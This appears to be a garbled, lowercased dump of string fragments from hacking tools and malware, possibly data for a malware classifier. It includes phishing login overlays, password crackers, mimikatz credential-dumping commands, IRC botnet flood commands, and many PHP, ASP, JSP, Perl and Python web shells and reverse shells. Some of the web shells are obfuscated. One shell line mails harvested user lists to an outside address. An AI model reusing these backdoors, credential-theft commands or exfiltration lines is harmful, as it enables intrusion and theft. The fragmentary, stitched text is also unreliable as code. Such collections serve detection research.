alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed 
out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 \x00cmd.exe\x00\x00sethc.exe\x00\x00debugger\x00\x00software\\microsoft\\windows nt\\currentversion\\image file execution options\x00set xpost = createobject(s1):xpost.open \"get\",iremote,0:xpost.send()set sget = createobject(s2):sget.mode=3:sget.type=1:sget.open()wsh.echo \"rcmd v1.01 by netpatch\"wsh.echo \"read.vbs created!!!\"wsh.echo \"cscript \"&wscript.scriptfullname&\" targetip username password commandauthentication id:authentication package:authentication domain:primary user:* user: * domain: * password: -slave-listenwating on port %d...\x0aend waiting2\x0a
1 $%!aaaaaa1|aaaaaa2|aaaaaa3|aaaaaa4|aaaaaa5|%s%d.exeastalavistagivemecache%s\\system32\\drivers\\blogs\\*bndk13merandom-number-hereconfig.txta/a/a/a/f.classa/a/a/a/l.classa/a/a/b/q.classa/a/a/b/v.classmachinedetailsmysettingssendftppasswordssendbrowserpasswordsarma2keymasskeylogger
1 invalid password hash: %s-= mysql hash cracker =- usage: %s hashhash: %08lx%08lxfound pass: pass not foundt
1 %d of %d target%s%scompleted, %lu valid password%s found[%d][smb] host: %s account: %s error: account_change_passwordhydra -p pass.txt target cisco-enable (direct console access)[%d][smb] host: %s account: %s error: password expired[error] smtp login auth, either this auth is disabled\"/login.php:user=^user^&pass=^pass^&mid=123:incorrect\"used pepack!\\temp\\ntgodmode.exentgod.batsfxcmdc:\\temp\\vncviewer4.log[bl4ck] patched by redsand || http://blacksecurity.orgfake release extendedvkey 0x%x, keysym 0x%xpipecmd \\\\%s -u:%s -p:\"\" %s[usage]: %s <hostname|ip> <username> <password>pipecmd \\\\%s -u:%s -p:%s %s============by uhhuhy (feb 18,2003) - http://www.cnhonker.net===================================ntcmd v0.11 for hscan v1.20=======================ntcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtsuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -ac
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 connecting http port - result: no space for command line argument vectormicrosoft(july/1999~) http://www.microsoft.com/technet/security/current.aspno space for copy of command line- windows nt,2000 patch method - scanf : floating point formats not linkedhrdir_b.c: loadlibrary != mmdll borlndmm failed!\"what?\"%s port %d closedprintf : floating point formats not linkedxxtype.cpp-err invalid command, type [help] for command list-err get sms users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u 
seconds. (found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
1 %s - simple sniffer for win2000 -pass : filter username/password -udp : output udp packets -tcp : output tcp packetsfscan v1.12 - command line port scanner. -n - no port scanning - only pinging (unless you use -q)example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200 -z - maximum simultaneous threads to use for scanningfailed to open the ip list file \"%s\" -p - tcp port(s) to scan (a comma separated list of ports/ranges) bind port number out of range. using system default.f
1 /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 ersingscandelete-tcbtime-wait1last-aclosing!fin!syn-receiv%cget %s 's password error!software\\microsoft\\active setup\\installed components\\{e3df6b419d1f}<start application 2 key><start application 1 key><select media key><start mail key><play/pause media key>0
1 software\\microsoft\\windows nt\\currentversion\\winlogon\\notify<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestversion=\"1.0\"><trustinfo xmlns=\"urn:schemas-microsoft-com:asm.v3<supportedos id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedos>getpassword1nvsmartmax.dlllicensedlgc
1 @@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%msgfile1%%\"==\"%%i\" del /f \"%%i\"logging out of webadmin (as target account)[+] connected to the registry servicef08d49ac41d1023d9d462d58af51414daff95a6a[+] checkcredentials(): checking to see if valid username/passworderror connecting to target, tbmakesocket() %s:%d.nterrormoreprocessingrequiredcommand format error: error=%xnterrorpasswordrestriction
1 s.failed_logins \"failed login attempts\", select role, password_required from sys.dba_roles order by roleselect spid 'spid', status 'status', db_name (dbid) 'database', loginame 'login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -s <:server:> -u <:user:> -p <:l.login_policy_name as \"login policy\", mailto:support@sqldbx.coms.last_login_time \"last login\", [ ] resolving pslookupprocessbyprocessidthe target is most likely patched.dojibiron by ronald huizer, (c) master@h4cker.us .[ ] creating evil window%shandlef_indestroy[+] set to %d exploit half succeeded/churraskito/-->usage: churraskito.exe \"command\" fuck,can't find wmi process pid./churraskito/-->found token %s wmiprvse.exeselect * from iiswebinfoip - %d; login - %d; password - %d; combination - %dip - 0; login - 0; password - 0; combination - 0create %d ip@loginl;passwordubrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?ip=n
1 [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? 
urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? 
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
(maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. 
php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . 
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? 
$cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file 